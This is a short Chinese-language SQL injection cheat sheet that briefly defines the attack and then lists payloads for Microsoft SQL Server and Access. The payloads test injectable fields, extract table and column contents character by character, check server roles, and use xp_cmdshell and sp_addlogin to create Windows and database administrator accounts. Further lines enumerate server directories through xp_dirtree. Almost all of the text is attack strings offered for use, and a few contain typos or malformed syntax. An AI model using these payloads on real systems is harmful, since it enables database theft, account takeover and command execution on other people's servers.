通过把sql命令插入到web表单提交或者输入域名或页面请求的查询字符串,最终达到七篇服务器执行恶意sql命令
;and 1=1 ;and 1=2
;and user > 0
;and (select count(*) from sysobjects) > 0 mssql ;and (select count(*) from msysobjects) > 0 access
'and [查询条件] and "='
'and [查询条件] and '%25'='
;and (select count(*) from [数据库铭]) > 0
;and (select count(字段名) from [数据库名]) > 0
;and (select top 1 len(字段名) from [数据库名]) > 0
;and (select top 1 asc(mid(字段名,1,1)) from [数据库名]) > 0
;and (select top 1 unicode(substring(字段名,1,1)) from [数据库]) > 0
;and 1 = (select IS_SRVROLEMEMBER('sysadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('serveradmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('setiupadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('securityadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('diskadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('bulkadmin'));-- ;and 1 = (select IS_MEMBER('db_owner'));--
;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null , username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- ;exec master.dbo.xp_cmdshell 'net user username password /add';-- ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
;create table dirs(paths varchar(100),id int) ;insert dirs exec master.dbo.xp_dirtree 'c:\' ;and (select top 1 paths from dirs) > 0 ;and (select top 1 paths from dirs where paths not in ('上步得到的paths'))>)